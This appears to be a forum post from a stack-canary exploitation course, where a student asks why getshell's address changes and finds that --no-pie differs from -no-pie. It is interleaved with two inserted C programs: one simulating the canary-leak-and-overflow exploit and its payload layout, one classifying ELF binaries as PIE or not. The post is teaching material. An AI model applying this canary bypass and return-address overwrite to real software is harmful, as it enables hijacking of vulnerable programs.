Stack Cookie - return address is random

Hi all-

I went through the stack cookie module last night. I compiled the binary on a 64-bit system:

gcc -m32 --no-pie canary.c -o canary

I went through the slides and created the pwntools Python file to run the multistage exploit:
1. The first buffer write leaks the stack canary (since the 0x00 byte becomes 0x0a from the newline and puts keeps printing until it encounters a 0x00 byte) without overflowing the buffer.
2. The second buffer write overflows while writing the correct stack canary to the correct place in the buffer, and overwrites what will become EIP with a hardcoded return address.

In the slides the hardcoded return address is for the dead function getshell obtained either through info functions or p getshell but when I run the exploit the prompt segfaults at the end. I determined that this is because the return address is wrong. Upon further inspection the address for getshell is different each time I run it in gdb.

This exercise is supposed to have the system ASLR enabled and it’s not supposed to matter. Why is the address for getshell changing?
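The two-stage logic the post describes, as an added example that is not part of the original post or the course's canary.c: a simulated 32-bit frame (a 32-byte buffer immediately followed by the canary, saved EBP and the return address; these offsets and the 0x08049196 return address are assumptions for the example, not values from the lab) shows why sending exactly the buffer size plus a newline makes puts leak the canary, how the leak is turned back into the canary by restoring its 0x00 low byte, and how the second payload is laid out. It also handles the case the post's description implies: if one of the canary's other bytes happens to be 0x00, puts stops early and the leak is too short, so a real exploit must detect that and try again (the canary changes on every run).

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Assumed frame layout for the example (not taken from canary.c):
   32-byte buffer, then the canary, saved EBP and the return address. */
#define BUF_SIZE    32
#define CANARY_OFF  BUF_SIZE
#define EBP_OFF     (CANARY_OFF + 4)
#define RET_OFF     (EBP_OFF + 4)
#define PAYLOAD_LEN (RET_OFF + 4)

struct frame {
    char     buf[BUF_SIZE];
    uint32_t canary;      /* glibc i386 canaries have a 0x00 low byte */
    uint32_t saved_ebp;
    uint32_t ret;
};

/* The vulnerable write: copies n bytes into buf with no bounds check,
   the way read()/fgets-style input lands in the lab binary. */
static void vuln_write(struct frame *f, const unsigned char *input, size_t n) {
    memcpy(f, input, n);
}

/* What puts(buf) emits: bytes from the start of the frame up to the first 0x00,
   bounded by the frame size so the simulation never reads past it. */
static size_t puts_leak(const struct frame *f, unsigned char *out, size_t cap) {
    const unsigned char *p = (const unsigned char *)f;
    size_t n = 0, lim = cap < sizeof *f ? cap : sizeof *f;
    while (n < lim && p[n] != 0) { out[n] = p[n]; n++; }
    return n;
}

/* Stage 1, exploit side: the newline sits on the canary's 0x00 byte, so the leak
   carries the other three canary bytes. Rebuild the value little-endian and put
   the null byte back. Returns 0 if the leak stopped early (a canary byte was 0x00). */
static uint32_t recover_canary(const unsigned char *leak, size_t leak_len) {
    if (leak_len < CANARY_OFF + 4) return 0;
    uint32_t c = 0;
    for (int i = 3; i >= 0; i--) c = (c << 8) | leak[CANARY_OFF + i];
    return c & 0xffffff00u;
}

/* Stage 2, exploit side: padding, the recovered canary, a dummy EBP, then the
   return address, written little-endian like pwntools' p32(). Returns the length. */
static size_t build_payload(unsigned char *out, uint32_t canary, uint32_t ret_addr) {
    memset(out, 'A', BUF_SIZE);
    memcpy(out + CANARY_OFF, &canary, 4);     /* assumes a little-endian host */
    memset(out + EBP_OFF, 'B', 4);
    memcpy(out + RET_OFF, &ret_addr, 4);
    return PAYLOAD_LEN;
}

/* Runs both stages against a fresh frame. Returns 1 when the canary survived the
   overflow and the return slot holds ret_addr, 0 when the leak was unusable. */
static int run_exploit(uint32_t real_canary, uint32_t ret_addr) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = real_canary;                   /* saved_ebp left 0: ends the leak */

    unsigned char in1[BUF_SIZE + 1];          /* stage 1: fill buf, newline on canary */
    memset(in1, 'A', BUF_SIZE);
    in1[BUF_SIZE] = '\n';
    vuln_write(&f, in1, sizeof in1);

    unsigned char leak[sizeof f];
    size_t n = puts_leak(&f, leak, sizeof leak);
    uint32_t got = recover_canary(leak, n);
    if (got != real_canary) return 0;         /* retry in a real exploit */

    unsigned char payload[PAYLOAD_LEN];       /* stage 2: overflow with right canary */
    size_t len = build_payload(payload, got, ret_addr);
    vuln_write(&f, payload, len);
    return f.canary == real_canary && f.ret == ret_addr;
}

int main(void) {
    /* 0x08049196 is a placeholder for getshell's fixed address in a non-PIE binary. */
    printf("canary 0xdeadbe00: %s\n", run_exploit(0xdeadbe00u, 0x08049196u) ? "ok" : "failed");
    printf("canary 0x12003400: %s\n", run_exploit(0x12003400u, 0x08049196u) ? "ok" : "failed (leak too short)");
    return 0;
}
```

The second run in main shows the failure mode: with a 0x00 in the canary's middle byte the leak ends after two bytes past the buffer, recover_canary returns 0, and the exploit must be rerun rather than sending a guessed value, which would trip the stack protector.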


I found the problem:

--no-pie is NOT the same as -no-pie

The program should be compiled like this:

gcc -m32 -no-pie canary.c -o canary

Now it works.
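A quick way to confirm which kind of binary gcc actually produced, as an added example rather than anything from the original post: a PIE is an ELF whose header carries e_type ET_DYN (3) and a small, relocatable entry point, while a non-PIE executable is ET_EXEC (2) with a fixed 32-bit entry such as 0x0804xxxx, which is why getshell's address only stays constant under ASLR in the second case. The program below reads just the ELF header; the two sample headers embedded in it are constructed for the test (the 0x08049060 entry is an invented value), and the file-reading path lets you run it as ./elfkind ./canary. readelf -h shows the same field as "Type: EXEC" or "DYN".

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

enum elf_kind { ELF_INVALID = -1, ELF_OTHER = 0, ELF_EXEC = 2, ELF_DYN = 3 };

/* Classify an ELF image from its first bytes by e_type. Needs at least the
   16-byte e_ident array plus the 2-byte e_type field (18 bytes). */
static int classify_elf(const unsigned char *hdr, size_t len) {
    static const unsigned char magic[4] = {0x7f, 'E', 'L', 'F'};
    if (len < 18 || memcmp(hdr, magic, 4) != 0) return ELF_INVALID;
    int cls  = hdr[4];   /* EI_CLASS: 1 = ELFCLASS32, 2 = ELFCLASS64 */
    int data = hdr[5];   /* EI_DATA:  1 = little-endian, 2 = big-endian */
    if ((cls != 1 && cls != 2) || (data != 1 && data != 2)) return ELF_INVALID;
    uint16_t e_type = (data == 1) ? (uint16_t)(hdr[16] | (hdr[17] << 8))
                                  : (uint16_t)((hdr[16] << 8) | hdr[17]);
    if (e_type == 2) return ELF_EXEC;   /* ET_EXEC: non-PIE, fixed addresses */
    if (e_type == 3) return ELF_DYN;    /* ET_DYN: PIE (or shared object) */
    return ELF_OTHER;
}

/* e_entry of a little-endian ELFCLASS32 header (4 bytes at offset 24);
   returns 0 for anything else. A non-PIE i386 binary shows 0x0804xxxx here. */
static uint32_t elf32_entry(const unsigned char *hdr, size_t len) {
    if (classify_elf(hdr, len) == ELF_INVALID || hdr[4] != 1 || hdr[5] != 1 || len < 28)
        return 0;
    return (uint32_t)hdr[24] | ((uint32_t)hdr[25] << 8) |
           ((uint32_t)hdr[26] << 16) | ((uint32_t)hdr[27] << 24);
}

static const char *describe(int kind) {
    switch (kind) {
    case ELF_EXEC: return "ET_EXEC: non-PIE, addresses are fixed (what -no-pie gives)";
    case ELF_DYN:  return "ET_DYN: PIE, addresses move on every run under ASLR";
    case ELF_OTHER: return "ELF, but neither EXEC nor DYN";
    default:       return "not an ELF file";
    }
}

/* Reads the header of the file at path and classifies it. */
static int classify_file(const char *path, uint32_t *entry_out) {
    unsigned char hdr[64] = {0};
    FILE *fp = fopen(path, "rb");
    if (!fp) return ELF_INVALID;
    size_t n = fread(hdr, 1, sizeof hdr, fp);
    fclose(fp);
    if (entry_out) *entry_out = elf32_entry(hdr, n);
    return classify_elf(hdr, n);
}

/* Constructed sample headers for the test (not dumped from any real binary):
   32-bit little-endian i386, e_type 2 with entry 0x08049060 and e_type 3 with
   entry 0x1060, the rest zeroed. */
static const unsigned char sample_exec_hdr[52] = {
    0x7f, 'E', 'L', 'F', 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    2, 0,   3, 0,   1, 0, 0, 0,   0x60, 0x90, 0x04, 0x08 };
static const unsigned char sample_pie_hdr[52] = {
    0x7f, 'E', 'L', 'F', 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    3, 0,   3, 0,   1, 0, 0, 0,   0x60, 0x10, 0x00, 0x00 };

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <elf-binary>\n", argv[0]);
        return 2;
    }
    uint32_t entry = 0;
    int kind = classify_file(argv[1], &entry);
    printf("%s: %s\n", argv[1], describe(kind));
    if (entry) printf("e_entry: 0x%08x\n", entry);
    return kind == ELF_EXEC ? 0 : 1;
}
```

If the binary reports ET_DYN after a rebuild, the compiler line is still producing a PIE; pwntools' checksec on the same file should then report PIE enabled, and the getshell address from gdb will keep changing between runs exactly as the post describes.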